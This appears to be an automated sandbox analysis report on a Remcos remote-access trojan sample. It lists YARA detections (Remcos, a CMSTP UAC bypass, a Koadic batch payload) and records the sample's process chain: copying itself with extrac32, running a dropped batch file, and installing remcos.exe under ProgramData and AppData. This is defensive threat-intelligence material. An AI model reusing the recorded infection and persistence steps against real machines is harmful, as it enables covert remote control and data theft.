              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@24/14@4/1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_1_00417952
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_1_00417952
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D67F90 GetDiskFreeSpaceA,0_2_02D67F90
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_1_0040F474
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D76D84 CoCreateInstance,0_2_02D76D84
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,6_1_0041B4A8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_1_0041AA4A
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile created: C:\Users\Public\Libraries\NullJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifMutant created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Software\6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Rmc-L24XL16_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Exe6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Exe6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Rmc-L24XL16_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Inj6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Inj6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: 8SG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: exepath6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: 8SG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: exepath6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: licence6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: dMG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PSG6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Administrator6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: User6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del6_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Software\10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Rmc-L24XL110_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Exe10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Exe10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Rmc-L24XL110_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Inj10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Inj10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: 8SG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: exepath10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: 8SG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: exepath10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: licence10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: dMG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: PSG10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: Administrator10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: User10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del10_1_0040E9C5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCommand line argument: del10_1_0040E9C5
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: udVh4Ist4Z.exeReversingLabs: Detection: 63%
              Source: udVh4Ist4Z.exeVirustotal: Detection: 66%
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeFile read: C:\Users\user\Desktop\udVh4Ist4Z.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\udVh4Ist4Z.exe "C:\Users\user\Desktop\udVh4Ist4Z.exe"
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\Users\Public\Libraries\Xjfxsfmn.PIF "C:\Users\Public\Libraries\Xjfxsfmn.PIF"
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\Users\Public\Libraries\Xjfxsfmn.PIF "C:\Users\Public\Libraries\Xjfxsfmn.PIF"
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "Jump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIFJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeProcess created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pifJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
